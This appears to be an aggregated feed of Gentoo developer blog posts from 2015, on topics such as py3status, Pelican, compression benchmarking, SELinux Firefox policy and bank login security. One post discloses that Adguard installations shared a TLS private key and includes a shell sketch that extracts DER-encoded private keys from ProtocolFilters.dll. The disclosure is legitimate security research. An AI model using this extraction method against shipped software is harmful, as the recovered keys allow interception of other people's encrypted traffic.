The meter also came with the new "OneTouch Delica" lancing system. Once again, what was true of the meter is true of the lancing system: it uses a new type of lancets, which is something that not even the Abbott device did. Indeed I have some four lancing devices that share the same kind of lancets already, and they even fit each other's cases, mostly, as they usually only have an elastic loop to fit on.

Comparatively, I'm happier about the new lancing device than I am about the meter. Not only is the lancet finer – which hurts significantly less, though it would not work well with the old strips' need for blood – but exactly as they promise on the website, the new device does not vibrate, which also makes for a less painful experience.

In my experience, pricking your finger multiple times a day is the most painful side effect of the light diabetes I have, so reducing that pain significantly improves my daily quality of life.

All in all, I'm happy that there are improvements always going on... I just wish the improvement went towards reducing the size of the device as well as improving its precision and information.

August 17, 2015
Alexys Jacob a.k.a. ultrabug (homepage, bugs)
py3status v2.5 (August 17, 2015, 15:05 UTC)

This new py3status comes with an amazing number of contributions and new modules !

24 files changed, 1900 insertions(+), 263 deletions(-)

I’m also glad to say that py3status becomes my first commit in the new git repository of Gentoo Linux !


Please note that this version has deprecated the legacy implicit module loading support to favour and focus on the generic i3status order += module loading/ordering !

New modules

  • new aws_bill module, by Anthony Brodard
  • new dropboxd_status module, by Tjaart van der Walt
  • new external_script module, by Dominik
  • new nvidia_temp module for displaying NVIDIA GPUs’ temperature, by J.M. Dana
  • new rate_counter module, by Amaury Brisou
  • new screenshot module, by Amaury Brisou
  • new static_string module, by Dominik
  • new taskwarrior module, by James Smith
  • new volume_status module, by Jan T.
  • new whatismyip module displaying your public/external IP as well as your online status


As usual, full changelog is available here.


Along with all those who reported issues and helped fix them, here is a quick and surely not exhaustive list of contributors:

  • Anthony Brodard
  • Tjaart van der Walt
  • Dominik
  • J.M. Dana
  • Amaury Brisou
  • James Smith
  • Jan T.
  • Zopieux
  • Horgix
  • hlmtre

What’s next ?

Well something tells me @Horgix is working hard on some standardization and on the core of py3status ! I’m sure some very interesting stuff will emerge from this, so thank you !

August 16, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Updates on my Pelican adventure (August 16, 2015, 17:50 UTC)

It's been a few weeks since I switched my blog to Pelican, a static site generator built with Python. A number of adjustments have been made since, which I'll happily talk about.

The full article view on index page

One of the features I wanted was to have my latest blog post fully readable from the front page (called the index page within Pelican). Sadly, I could not find a plugin or setting that would do this directly, but I did find a plugin that I can use to work around it: the summary plugin.

Enabling the plugin was a breeze. Extract the plugin sources in the plugin/ folder, and enable it in the Pelican configuration:

PLUGINS = [..., 'summary']

With this plug-in, articles can use inline comments to tell the system at which point the summary of the article stops. Usually, the summary (which is displayed on index pages) is the first paragraph (or set of paragraphs). What I do now is manually set the summary to the entire blog post for the latest post, and adjust it later when a new post comes up.

It might be some manual labour, but it fits nicely and doesn't hack around in the code too much.
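For reference, the inline comments look roughly like this in a Markdown article (the marker names are the summary plugin's defaults, going from memory):

```markdown
Title: Example post

<!-- PELICAN_BEGIN_SUMMARY -->
This opening part is shown on the index page as the summary.
<!-- PELICAN_END_SUMMARY -->

The rest of the article only appears on the article page itself.
```

Moving the end marker below the last paragraph makes the whole post the summary, which is what I do for the latest article.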

Commenting with Disqus

I had some remarks that the Disqus integration is not as intuitive as expected. Some readers had difficulties finding out how to comment as a guest (without the need to log on through popular social media or through Disqus itself).

Agreed, it is not easy to see at first sight that people need to start typing their name in the Or sign up with disqus field before they can select I'd rather post as guest. As I don't have any way of controlling the format and rendered code of Disqus, I updated the theme a bit to add two paragraphs on commenting. The first paragraph tells how to comment as a guest.

The second paragraph for now informs readers that non-verified comments are put in the moderation queue. Once I get a feeling of how the spam and bots act on the commenting system, I will adjust the filters and also allow guest comments to be readily accessible (no moderation queue). Give it a few more weeks to get myself settled and I'll adjust it.

If the performance of the site is slowed down by the Disqus javascripts, it is mainly at the initial load: both Firefox (excuse me, Aurora) and Chromium show this. Later, the scripts are properly cached and load in relatively fast (a quick test shows all pages I tried load in less than 2 seconds - WordPress was at 4). And if you're not interested in commenting, then you can even use NoScript or similar plugins to disallow any remote javascript.

Still, I will continue to look at how to make commenting easier. I recently allowed unmoderated comments (unless a number of keywords are added, and comments with links are also put in the moderation queue). If someone knows of another comment-like system that I could integrate I'm happy to hear about it as well.


Tipue Search

My issue with Tipue Search has been fixed by reverting a change in the plugin where the URL was assigned to the loc key instead of url. It is probably a mismatch between the plugin and the theme (the change of the key was done in May in Tipue Search itself).

With this minor issue fixed, the search capabilities are back on track on my blog. Enabling it was a matter of:

PLUGINS = [..., 'tipue_search']
DIRECT_TEMPLATES = ((..., 'search'))

Tags and categories

WordPress supports multiple categories, but Pelican does not. So I went through the various posts that had multiple categories and decided on a single one. While doing so, I also reduced the categories to a small set:

  • Databases
  • Documentation
  • Free Software
  • Gentoo
  • Misc
  • Security
  • SELinux

I will try to properly tag all posts so that, if someone is interested in a very particular topic, such as PostgreSQL, he can reach those posts through the tag.

August 13, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Finding a good compression utility (August 13, 2015, 17:15 UTC)

I recently came across a wiki page written by Herman Brule which gives a quick benchmark on a couple of compression methods / algorithms. It gave me the idea of writing a quick script that tests out a wide number of compression utilities available in Gentoo (usually through the app-arch category), along with a number of options (in case multiple options are possible).

The currently supported packages are:

app-arch/bloscpack      app-arch/bzip2          app-arch/freeze
app-arch/gzip           app-arch/lha            app-arch/lrzip
app-arch/lz4            app-arch/lzip           app-arch/lzma
app-arch/lzop           app-arch/mscompress     app-arch/p7zip
app-arch/pigz           app-arch/pixz           app-arch/plzip
app-arch/pxz            app-arch/rar            app-arch/rzip
app-arch/xar            app-arch/xz-utils       app-arch/zopfli

The script should keep the best compression information: duration, compression ratio, compression command, as well as the compressed file itself.

Finding the "best" compression

It is not my intention to find the most optimal compression, as that would require heuristically trying out various optimization parameters (which has triggered my interest in seeking such software, or writing it myself).

No, what I want is to find the "best" compression for a given file, with "best" being either

  • most reduced size (which I call compression delta in my script)
  • best reduction obtained per time unit (which I call the efficiency)

For me personally, I think I would use it for the various raw image files that I have through the photography hobby. Those image files are difficult to compress (the Nikon DS3200 I use is an entry-level camera which applies lossy compression already for its raw files) but their total size is considerable, and it would allow me to better use the storage I have available both on my laptop (which is SSD-only) as well as backup server.

But next to the best compression ratio, the efficiency is also an important metric, as it shows how efficiently the algorithm works within a certain time. If one compression method yields 80% reduction in 5 minutes, and another yields 80,5% in 45 minutes, then I might prefer the first one even though it does not give the best compression overall.
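Concretely, both metrics can be computed from the sizes and the duration alone; this is my reading of the script's columns, using the plain bzip2 run from the example output below:

```shell
# Compression delta: fraction of the original size shaved off.
# Efficiency: delta obtained per second of compression time.
ORIG=20958430    # original size of test.nef in bytes
COMP=19285616    # size after the plain bzip2 run
DURATION=2.0     # seconds
DELTA=$(awk -v o="$ORIG" -v c="$COMP" 'BEGIN { printf "%.5f", 1 - c/o }')
EFFIC=$(awk -v d="$DELTA" -v t="$DURATION" 'BEGIN { printf "%.5f", d/t }')
echo "compr.delta=${DELTA} efficiency=${EFFIC}"
# -> compr.delta=0.07982 efficiency=0.03991, matching the bzip2 table row
```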

Although the script could be used to get the most compression (without resorting to an optimization algorithm for the compression commands) for each file, this is definitely not the use case. A single run can take hours for files that are compressed in a handful of seconds. But it can show the best algorithms for a particular file type (for instance, do a few runs on a couple of raw image files and see which method is most successful).

Another use case I'm currently looking into is how much improvement I can get when multiple files (all raw image files) are first grouped in a single archive (.tar). Theoretically, this should improve the compression, but by how much?
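A quick manual test of this hypothesis could look as follows (file names are hypothetical, and I use gzip only for illustration; any of the tested compressors would do):

```shell
# Compare compressing each raw image individually against compressing one
# combined tar archive of the same files.
tar -cf images.tar ./*.nef
gzip -k -9 images.tar                        # -> images.tar.gz
for f in ./*.nef; do gzip -k -9 "$f"; done   # -> one .gz file per image
wc -c images.tar.gz ./*.nef.gz               # compare the resulting sizes
```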

How the script works

The script does not contain much intelligence. It iterates over a wide set of compression commands that I tested out, checks the final compressed file size, and if it is better than a previous one it keeps this compressed file (and its statistics).

I tried to group some of the compressions together based on the algorithm used, but as I don't really know the details of the algorithms (it's based on manual pages and internet sites) and some of them combine multiple algorithms, it is more of a high-level selection than anything else.

The script can also only run the compressions of a single application (which I use when I'm fine-tuning the parameter runs).

A run shows something like the following:

Original file (test.nef) size 20958430 bytes
      package name                                                 command      duration                   size compr.Δ effic.:
      ------------                                                 -------      --------                   ---- ------- -------
app-arch/bloscpack                                               blpk -n 4           0.1               20947097 0.00054 0.00416
app-arch/bloscpack                                               blpk -n 8           0.1               20947097 0.00054 0.00492
app-arch/bloscpack                                              blpk -n 16           0.1               20947097 0.00054 0.00492
    app-arch/bzip2                                                   bzip2           2.0               19285616 0.07982 0.03991
    app-arch/bzip2                                                bzip2 -1           2.0               19881886 0.05137 0.02543
    app-arch/bzip2                                                bzip2 -2           1.9               19673083 0.06133 0.03211
    app-arch/p7zip                                      7za -tzip -mm=PPMd           5.9               19002882 0.09331 0.01592
    app-arch/p7zip                             7za -tzip -mm=PPMd -mmem=24           5.7               19002882 0.09331 0.01640
    app-arch/p7zip                             7za -tzip -mm=PPMd -mmem=25           6.4               18871933 0.09955 0.01551
    app-arch/p7zip                             7za -tzip -mm=PPMd -mmem=26           7.7               18771632 0.10434 0.01364
    app-arch/p7zip                             7za -tzip -mm=PPMd -mmem=27           9.0               18652402 0.11003 0.01224
    app-arch/p7zip                             7za -tzip -mm=PPMd -mmem=28          10.0               18521291 0.11628 0.01161
    app-arch/p7zip                                       7za -t7z -m0=PPMd           5.7               18999088 0.09349 0.01634
    app-arch/p7zip                                7za -t7z -m0=PPMd:mem=24           5.8               18999088 0.09349 0.01617
    app-arch/p7zip                                7za -t7z -m0=PPMd:mem=25           6.5               18868478 0.09972 0.01534
    app-arch/p7zip                                7za -t7z -m0=PPMd:mem=26           7.5               18770031 0.10442 0.01387
    app-arch/p7zip                                7za -t7z -m0=PPMd:mem=27           8.6               18651294 0.11008 0.01282
    app-arch/p7zip                                7za -t7z -m0=PPMd:mem=28          10.6               18518330 0.11643 0.01100
      app-arch/rar                                                     rar           0.9               20249470 0.03383 0.03980
      app-arch/rar                                                 rar -m0           0.0               20958497 -0.00000        -0.00008
      app-arch/rar                                                 rar -m1           0.2               20243598 0.03411 0.14829
      app-arch/rar                                                 rar -m2           0.8               20252266 0.03369 0.04433
      app-arch/rar                                                 rar -m3           0.8               20249470 0.03383 0.04027
      app-arch/rar                                                 rar -m4           0.9               20248859 0.03386 0.03983
      app-arch/rar                                                 rar -m5           0.8               20248577 0.03387 0.04181
    app-arch/lrzip                                                lrzip -z          13.1               19769417 0.05673 0.00432
     app-arch/zpaq                                                    zpaq           0.2               20970029 -0.00055        -0.00252
The best compression was found with 7za -t7z -m0=PPMd:mem=28.
The compression delta obtained was 0.11643 within 10.58 seconds.
This file is now available as test.nef.7z.

In the above example, the test file was around 20 MByte. The best compression command that the script found was:

~$ 7za -t7z -m0=PPMd:mem=28 a test.nef.7z test.nef

The resulting file (test.nef.7z) is 18 MByte, a reduction of 11,64%. The compression command took almost 11 seconds to do its thing, giving an efficiency rating of 0,011 - definitely not a fast one.

Some other algorithms don't do bad either with a better efficiency. For instance:

   app-arch/pbzip2                                                  pbzip2           0.6               19287402 0.07973 0.13071

In this case, the pbzip2 command got almost 8% reduction in less than a second, which is considerably more efficient than the 11-seconds long 7za run.

Want to try it out yourself?

I've pushed the script to my github location. Do a quick review of the code first (to see that I did not include anything malicious) and then execute it to see how it works:

~$ sw_comprbest -h
Usage: sw_comprbest --infile=<inputfile> [--family=<family>[,...]] [--command=<cmd>]
       sw_comprbest -i <inputfile> [-f <family>[,...]] [-c <cmd>]

Supported families: blosc bwt deflate lzma ppmd zpaq. These can be provided comma-separated.
Command is an additional filter - only the tests that use this base command are run.

The output shows
  - The package (in Gentoo) that the command belongs to
  - The command run
  - The duration (in seconds)
  - The size (in bytes) of the resulting file
  - The compression delta (percentage) showing how much is reduced (higher is better)
  - The efficiency ratio showing how much reduction (percentage) per second (higher is better)

When the command supports multithreading, we use the number of available cores on the system (as told by /proc/cpuinfo).
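For example (the exact invocation is my guess; nproc would yield the same number):

```shell
# Number of cores as reported by /proc/cpuinfo, passed to a
# multithreading-capable compressor such as pigz (parallel gzip).
CORES=$(grep -c '^processor' /proc/cpuinfo)
echo "Using ${CORES} threads"
pigz -k -p "${CORES}" test.nef   # test.nef as in the earlier example run
```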

For instance, to try it out against a PDF file:

~$ sw_comprbest -i MEA6-Sven_Vermeulen-Research_Summary.pdf
Original file (MEA6-Sven_Vermeulen-Research_Summary.pdf) size 117763 bytes
The best compression was found with zopfli --deflate.
The compression delta obtained was 0.00982 within 0.19 seconds.
This file is now available as MEA6-Sven_Vermeulen-Research_Summary.pdf.deflate.

So in this case, the resulting file is hardly better compressed - the PDF itself is already compressed. Let's try it against the uncompressed PDF:

~$ pdftk MEA6-Sven_Vermeulen-Research_Summary.pdf output test.pdf uncompress
~$ sw_comprbest -i test.pdf
Original file (test.pdf) size 144670 bytes
The best compression was found with lrzip -z.
The compression delta obtained was 0.27739 within 0.18 seconds.
This file is now available as test.pdf.lrz.

This is somewhat better:

~$ ls -l MEA6-Sven_Vermeulen-Research_Summary.pdf* test.pdf*
-rw-r--r--. 1 swift swift 117763 Aug  7 14:32 MEA6-Sven_Vermeulen-Research_Summary.pdf
-rw-r--r--. 1 swift swift 116606 Aug  7 14:32 MEA6-Sven_Vermeulen-Research_Summary.pdf.deflate
-rw-r--r--. 1 swift swift 144670 Aug  7 14:34 test.pdf
-rw-r--r--. 1 swift swift 104540 Aug  7 14:35 test.pdf.lrz

The resulting file is 11,22% reduced from the original one.

August 12, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)

Adguard certificate

In February the discovery of software called Superfish attracted widespread attention. Superfish caused a severe security vulnerability by intercepting HTTPS connections with a Man-in-the-Middle certificate. The certificate and the corresponding private key were shared amongst all installations.

The use of Man-in-the-Middle proxies for traffic interception is a widespread method: an application installs a root certificate into the browser and later intercepts connections by creating signed certificates for webpages on the fly. It quickly became clear that Superfish was only the tip of the iceberg. The underlying software module Komodia was used in a whole range of applications, all suffering from the same bug. Later another software named Privdog was found that also intercepted HTTPS traffic, and I published a blog post explaining that it was broken in a different way: it completely failed to do any certificate verification on its connections.

In a later blogpost I analyzed several Antivirus applications that also intercept HTTPS traffic. They were not as broken as Superfish or Privdog, but all of them decreased the security of the TLS encryption in one way or another. The most severe issue was that Kaspersky was at that point still vulnerable to the FREAK bug, more than a month after it was discovered. In a comment to that blogpost I was asked about a software called Adguard. I have to apologize that it took me so long to write this up.

Different certificate, same key

The first thing I did was to install Adguard two times in different VMs and look at the root certificate that got installed into the browser. The fingerprint of the certificates was different. However a closer look revealed something interesting: The RSA modulus was the same. It turned out that Adguard created a new root certificate with a changing serial number for every installation, but it didn't generate a new key. Therefore it is vulnerable to the same attacks as Superfish.
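The check itself is straightforward with OpenSSL; the file names below are hypothetical exports of the root certificates from the two installations:

```shell
# If both certificates print the same modulus, the installations share the
# same RSA key pair, even though serial numbers and fingerprints differ.
openssl x509 -in adguard-vm1.crt -noout -modulus
openssl x509 -in adguard-vm2.crt -noout -modulus
```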

I reported this issue to Adguard. Adguard has fixed this issue, however they still intercept HTTPS traffic.

I learned that Adguard did not always use the same key, instead it chose one out of ten different keys based on the CPU. All ten keys could easily be extracted from a file called ProtocolFilters.dll that was shipped with Adguard. Older versions of Adguard only used one key shared amongst all installations. There also was a very outdated copy of the nss library. It suffers from various vulnerabilities, however it seems they are not exploitable. The library is not used for TLS connections, its only job is to install certificates into the Firefox root store.

Meet Privdog again

The outdated nss version gave me a hint, because I had seen this before: in Privdog. I had spent some time trying to find out if Privdog would be vulnerable to known nss issues (which had the positive side effect that Filippo created proof of concept code for the BERserk vulnerability). What I didn't notice back then was the shared key issue. Privdog also used the same key amongst different installations. So it turns out Privdog was completely broken in two different ways: by sharing the private key amongst installations and by not verifying certificates.

The latest version of Privdog no longer intercepts HTTPS traffic, it works as a browser plugin now. I don't know whether this vulnerability was still present after the initial fix caused by my original blog post.

Now what is this ProtocolFilters.dll? It is a commercial software module that is supposed to be used along with a product called Netfilter SDK. I wondered where else this would be found and if we would have another widely used software module like Komodia.

ProtocolFilters.dll is mentioned a lot on the web, mostly in the context of Potentially Unwanted Applications, also called Crapware. That means software that is either preinstalled or gets bundled with installers from other software and is often installed without the user's consent, or by tricking the user into clicking some "ok" button without knowing that he or she agrees to install other software. Unfortunately I was unable to get my hands on any other software using it.

Lots of "Potentially Unwanted Applications" use ProtocolFilters.dll

Software names that I found that supposedly include ProtocolFilters.dll: Coupoon, CashReminder, SavingsDownloader, Scorpion Saver, SavingsbullFilter, BRApp, NCupons, Nurjax, Couponarific, delshark, rrsavings, triosir, screentk. If anyone has any of them or any other piece of software bundling ProtocolFilters.dll I'd be interested in receiving a copy.

I'm publishing all Adguard keys and the Privdog key together with example certificates here. I also created a trivial script that can be used to extract keys from ProtocolFilters.dll (or other binary files that include TLS private keys in their binary form). It looks for anything that could be a private key by its initial bytes and then calls OpenSSL to try to decode it. If OpenSSL succeeds it will dump the key.
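In rough outline, such an extraction can be sketched like this (a simplified illustration, not the actual script; the file name and carve size are arbitrary, and the pattern only covers DER-encoded RSA keys):

```shell
# Scan a binary for byte sequences that look like the start of a
# DER-encoded RSA private key (SEQUENCE, long-form length, version
# INTEGER 0), carve out a candidate at each hit, and let OpenSSL
# decide whether it actually parses as a key.
FILE=ProtocolFilters.dll
for off in $(grep -aboP '\x30\x82..\x02\x01\x00' "$FILE" | cut -d: -f1); do
    dd if="$FILE" of=candidate.der bs=1 skip="$off" count=4096 2>/dev/null
    openssl rsa -inform DER -in candidate.der -noout 2>/dev/null \
        && echo "Recoverable RSA key at offset $off"
done
```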

Finally an announcement for visitors of the Chaos Communication Camp: I will give a talk about TLS interception issues and the whole story of Superfish, Privdog and friends on Sunday.

Update: Due to the storm the talk was delayed. It will happen on Monday at 12:30 in Track South.

Gentoo Package Repository now using Git (August 12, 2015, 00:00 UTC)

Good things come to those who wait: The main Gentoo package repository (also known as the Portage tree or by its historic name gentoo-x86) is now based on Git.


The Gentoo Git migration has arrived and is expected to be completed soon. As previously announced, the CVS freeze occurred on 8 August and Git commits for developers were opened soon after. As a last step, rsync mirrors are expected to have the updated changelogs again on or after 12 August. Read-only access to gentoo-x86 (and write to the other CVS repositories) was restored on 9 August following the freeze.


Work on migrating the repository from CVS to Git began in 2006 with a proof-of-concept migration project during the Summer of Code. Back then, migrating the repository took a week and using Git was considerably slower than using CVS. While plans to move were shelved for a while, things improved over the coming years. Several features were implemented in Git, Portage, and other tools to meet the requirements of a migrated repository.

What changes?

The repository can be checked out from and is available via our Git web interface.

For users of our package repository, nothing changes: Updates continue to be available via the established mechanisms (rsync, webrsync, snapshots). Options to fetch the package tree via Git are to be announced later.

The migration facilitates the process of new contributors getting involved as proxy maintainers and eventually Developers. Alternate places for users to submit pull requests, such as GitHub, can be expected in the future.

In regards to package signing, the migration will streamline how GPG keys are used. This will allow end-to-end signature tracking from the developer to the final repository, as outlined in GLEP 57 et seq.

While the last issues are being worked on, join us in thanking everyone involved in the project. As always, you can discuss this on our Forums or hit up @Gentoo.

August 11, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Why we do confine Firefox (August 11, 2015, 17:18 UTC)

If you follow the SELinux development community a bit, you will know Dan Walsh, a Red Hat security engineer. Today he blogged about CVE-2015-4495 and SELinux, or why doesn't SELinux confine Firefox. He should have asked why the reference policy or the Red Hat/Fedora policy does not confine Firefox, because SELinux is, as I've mentioned before, not the same as its policy.

In effect, Gentoo's SELinux policy does confine Firefox by default. One of the principles we focus on in Gentoo Hardened is to develop desktop policies in order to reduce exposure and information leakage of user documents. We might not have the manpower to confine all desktop applications, but I do think it is worthwhile to at least attempt to do this, even though what Dan Walsh mentioned is also correct: desktops are notoriously difficult to use a mandatory access control system on.

How Gentoo wants to support more confined desktop applications

What Gentoo Hardened tries to do is to support the XDG Base Directory Specification for several documentation types. Downloads are marked as xdg_downloads_home_t, pictures are marked as xdg_pictures_home_t, etc.

With those types defined, we grant the regular user domains full access to those types, but start removing access to user content from applications. Rules such as the following are commented out or removed from the policies:

# userdom_manage_user_home_content_dirs(mozilla_t)
# userdom_manage_user_home_content_files(mozilla_t)

Instead, we add in a call to a template we have defined ourselves:

userdom_user_content_access_template(mozilla, { mozilla_t mozilla_plugin_t })

This call makes access to user content optional through SELinux booleans. For instance, for the mozilla_t domain (which is used for Firefox), the following booleans are created:

# Read generic (user_home_t) user content
mozilla_read_generic_user_content       ->      true

# Read all user content
mozilla_read_all_user_content           ->      false

# Manage generic (user_home_t) user content
mozilla_manage_generic_user_content     ->      false

# Manage all user content
mozilla_manage_all_user_content         ->      false

As you can see, the default setting is that Firefox can read user content, but only non-specific types. So ssh_home_t, the type used for SSH-related files, is not readable by Firefox with our policy by default.

By changing these booleans, the policy is fine-tuned to the requirements of the administrator. On my systems, mozilla_read_generic_user_content is switched off.

You might ask how we can then still support a browser if it cannot access user content to upload or download. Well, as mentioned before, we support the XDG types. The browser is allowed to manage xdg_download_home_t files and directories. For the majority of cases, this is sufficient. I also don't mind copying over files to the ~/Downloads directory just for uploading files. But I am well aware that this is not what the majority of users would want, which is why the default is as it is.

There is much more work to be done sadly

As said earlier, the default policy will allow reading of user files if those files are not typed specifically. Types that are protected by our policy (but not by the standard reference policy) include SSH-related files at ~/.ssh and GnuPG files at ~/.gnupg. Even other configuration files, such as my Mutt configuration (~/.muttrc), which contains a password for an IMAP server I connect to, are not reachable.

However, it is still far from perfect. One of the reasons is that many desktop applications are not "converted" yet to our desktop policy approach. Chromium is already converted, and policies we've added, such as the one for Skype, also do not allow direct access unless the user explicitly enables it. But Evolution, for instance, isn't converted yet.

Converting desktop policies to a more strict setup requires lots of testing, which translates to many human resources. Within Gentoo, only a few developers and contributors are working on policies, and considering that this change is not yet part of the (upstream) reference policy, some contributors do not want to put much focus on it either. But without the work being done, it will not be easy (nor probably acceptable) to upstream this: the XDG patch has been submitted a few times already, but wasn't deemed ready yet at the time.

Having a more restrictive policy isn't the end

As the blog post of Dan rightly mentioned, there are still quite some other ways of accessing information that we might want to protect. An application might not have access to user files, but may be able to communicate (for instance through DBus) with an application that does, and through that instruct it to pass on the data.

Plugins might require permissions which do not match with the principles set up earlier. When we tried out Google Talk (needed for proper Google Hangouts support) we noticed that it requires many, many more privileges. Luckily, we were able to write down and develop a policy for the Google Talk plugin (googletalk_plugin_t) so it is still properly confined. But this is just a single plugin, and I'm sure that more plugins exist which will have similar requirements. Which leads to more policy development.

But having workarounds does not make the effort we do worthless. Being able to work around a firewall through application data does not make the firewall useless, it is just one of the many security layers. The same is true with SELinux policies.

I am glad that we at least try to confine desktop applications more, and that Gentoo Hardened users who use SELinux are at least somewhat more protected from the vulnerability (even with the default case) and that our investment for this is sound.

August 09, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

A couple of months ago I promised a post on bank security. The topic is not an easy one to write about, as I would not say I have the chops to talk about it. After all I have never worked at a bank, and unlike Andrea I have not spent years researching into payment processing security.

I am, though, confident enough to write about some of the user-side security implementations (and blunders) of banks, for the simple fact that I have had more interaction with multiple banks in different countries than the average person. I can thus compare notes between these different banks and countries, and point out what is good and what is mental in their implementations, as I see it.

If you are looking for more in-depth security analysis, such as Point-of-Sale security or Chip-and-PIN analysis, I would suggest you look up talks of people like Andrea Barisani, linked earlier, or Krebs on Security — who should probably write an ATM skimmer guide, companion to Spam Nation. Both of them spent real time digging into the inner working of banks, which I haven't done.

In my discussion of security features, I'll be accepting as valid the research on security questions, published earlier this year by Google. Not only do I find the results pretty consistent with my personal experience (even though this could be counted as confirmation bias), but once again I accept the results and information coming from people who have had more time, and more data, to think about the problem.

The objective of this blog is to discuss which security features are in use by banks to protect customers, and whether these features work towards or against that goal, but before I dig into the nitty gritty details, I think it's important to define what these security features are meant to protect in the first place. It might sound obvious, but talking about this with different people showed it not to be the case.

The obvious part is that you don't want a random attacker to gain access to your bank account and transfer your money to their account. This is the very minimal protection you expect from your bank. You also don't want people to know how much money you have, or where you spend it — leaving aside the favourite talking points of privacy advocates on the matter, knowing this kind of information is a treasure trove for blackmail.

There are many more pieces of information that should stay private, and often are not. Most people (but of course, not everybody) know to keep the number of their credit/debit card safe. What is not that obvious is that your IBAN (and BIC) should be kept secret, too — for my readers in the United States, these roughly correspond to account and ABA numbers. People are used to seeing IBANs for various companies and utilities displayed on websites or invoices, explicitly so you can make payments to them, but that does not mean personal accounts should be advertised the same way. Jeremy Clarkson fell for it, too: he assumed that having someone's IBAN, Sort Code – which is actually already part of the IBAN, but let's move on – and registered address would at most let people send money to him.

What he found out is that, in addition to sending money to him, someone could set up a direct debit against his account. In this case, the "prankster" decided to set up a £500 direct debit, if my memory does not betray me, towards Diabetes UK. And he probably didn't even notice that until he went to check his statement. On the other hand, if you think of doing the same to a person on a regular income, you can easily cause them trouble. This is a kind of attack I like to call Denial-of-Cash: it is a similar attack to a Denial-of-Service — it does not gain the attacker anything directly, but it's a common tactic to set up blackmailing, or just to cause (big) inconvenience to a target. Protecting against Denial-of-Cash is in my opinion just as important as protecting against blatant theft.

As I'll show later, most banks have proper protection in place against theft, but Denial-of-Cash is a different story. Usually there is tight security against transferring money to a new account, but transfers to a known account require minimal or no security. An attacker may not be able to take the money from the victim, but they may still be able to remove economic means from the victim, at least for a while — I say this because I'd expect most of the frequent payees would allow you to get your money back at some point, even if they are utility companies rather than family members.

You could think that nobody would waste time on this kind of attack, since it still requires gaining access to a bank account. But then I would point out that the Internet is full of people spending time, and money, to achieve what is at best a nuisance and at worst terror: (D)DoS, SWATing and doxxing. Given how much time people spend going after public figures they don't like, this kind of attack is far from unlikely.

Now, before I start talking about the actual security features, I should provide the list of banks I'm going to talk about. These are going to be split across four different countries: Italy, USA, Ireland and (in a very small way) UK — these being the countries I spent considerable amount of time living in, or having contact with.

My longest-serving bank is my Italian one, as I've been a customer of UniCredit Banca for well over ten years; you may know this bank from some of its branches in other European countries, including many in the former Eastern Bloc. I doubt it shares infrastructure or security features between these branches, though.

In Ireland, where I currently live, I have tried three different banks: AIB, KBC Ireland – a Belgian bank, although I'm not sure if it shares anything with their main branch – and Ulster Bank. The latter is part of RBS Group, and so is my only UK bank – Ulster Bank, Northern Ireland – and I know for sure they do share lots, if not all, the systems between them.

To complete the picture, in the United States I have and use a Chase account. I also used to have the City National Bank account, a smaller Californian bank, from when I lived in Los Angeles, but I have no idea what their systems look like at all now, so I'd rather not talk about them.

In addition to the banks themselves, I can provide some comparison with other financial services: Charles Schwab (a stock broker), Transferwise (a service that allows you to transfer money across currencies at acceptable rates and fees) and PayPal. I should probably count Tesco Ireland as well, since they are my credit card provider, but I'll just add a note later about that.

Also, before I continue, I would point out that this is already making me uneasy. My paranoia would push me to hide where my money actually is. I will continue, though, under the assumption that anything that happens would be proving my point, and I hope I have enough redundancies, so that a Denial-of-Cash attack would not really be feasible. I will also point out that my birthdate is not strictly a secret, while my mother's maiden name is not very well known, and that's going to stay that way — it is obvious to the people who know me in person from Italy, but other than that there is no online connection between me and my mother. This should become obviously relevant pretty soon.

Let's start with accessing the websites of the banks — all six banks have an online banking system: this is actually a requirement for me, especially as I'm travelling for a good part of the year and, for most of them, don't even live in the country the bank is in. With the exception of Chase, the banks provided me a numeric-only user ID.

For both KBC and Ulster Bank, the user ID was formed by my birthdate followed by four allegedly random digits; but in the particular case of Ulster Bank, you can lie on your date of birth at registration time, as I found out by making a mistake.

Chase is the only bank that let me choose my own username — they insisted on an alphanumeric one, so it's not my usual one either. Transferwise and PayPal, as they are essentially "born on the Internet", use email addresses as identifiers, which I like, since it's one fewer parameter to commit to memory, but it is obviously not secret. Charles Schwab generates usernames based on names.

The situation with passwords is more interesting. The Internet companies are the ones that act most naturally, allowing a single password with all kinds of characters and a fairly high length limit. Chase is the second most sane by letting me select my password, although it is case-insensitive – and I'm not sure if they use a hashing scheme that normalizes the case, do case normalization on the client side, or store passwords unencrypted; I hope for one of the first two.
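To put a number on what case-insensitivity costs (my own back-of-the-envelope calculation, not anything Chase publishes): folding case shrinks the per-character alphabet from 62 symbols to 36, and the entropy loss compounds with password length.

```python
from math import log2

def password_bits(alphabet_size: int, length: int) -> float:
    """Entropy in bits of a uniformly random password."""
    return length * log2(alphabet_size)

# For a 10-character alphanumeric password:
case_sensitive = password_bits(62, 10)    # upper + lower + digits
case_insensitive = password_bits(36, 10)  # letters case-folded + digits
# roughly 59.5 vs 51.7 bits - about 8 bits, a factor of ~230, lost
```

Of course real passwords are not uniformly random, but the relative loss applies either way.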

Ulster Bank comes third by allowing me to choose both a password (long, alphanumeric, case-sensitive) and a numeric-only PIN, but then they mess it up by doing something crazy. They are followed by Charles Schwab (8-character alphanumeric password), UniCredit (8-digit numeric-only PIN) and AIB (5-digit numeric-only PIN, plus the same craziness as Ulster Bank). KBC is not on the list, as it has no password at all and does something slightly more insane, which I'll get to later.

What Ulster Bank and AIB both do, which I find crazy, is asking you to provide them with only parts of your password and/or PIN. For example, they may ask you the 1st, the 6th and the 13th characters of the password — in the case of Ulster Bank they ask three out of four digits of your PIN, and three out of at most 20 characters of your password, together, to log into their Anytime Banking website.

This is not a completely mindless choice: it finds its reasoning in dealing with phishing attacks — if you know your bank will never ask you for the full password, the attacker can only hope to get parts of it, and it's then unlikely they'll be able to enter your online banking, as they'd have to be asked exactly those characters they just phished out of you.

Unfortunately this improves security only in theory. In practice it makes it worse. The first problem is that lots of people will not consider "my bank will never ask me the full password" as an absolute truth, and because of that, phishers can still just ask for the full password and be done with it. The second problem is that it requires people to come up with passwords that are not only memorable (and those are bad passwords), but also easy to count into, for example by joining together very short words, or other similar mnemonic tricks. The third problem, which honestly bothers me the most, is that this stops me from using a password manager like LastPass to auto-fill the password for me. See also this Wired article that was published while this blog post was still in draft.

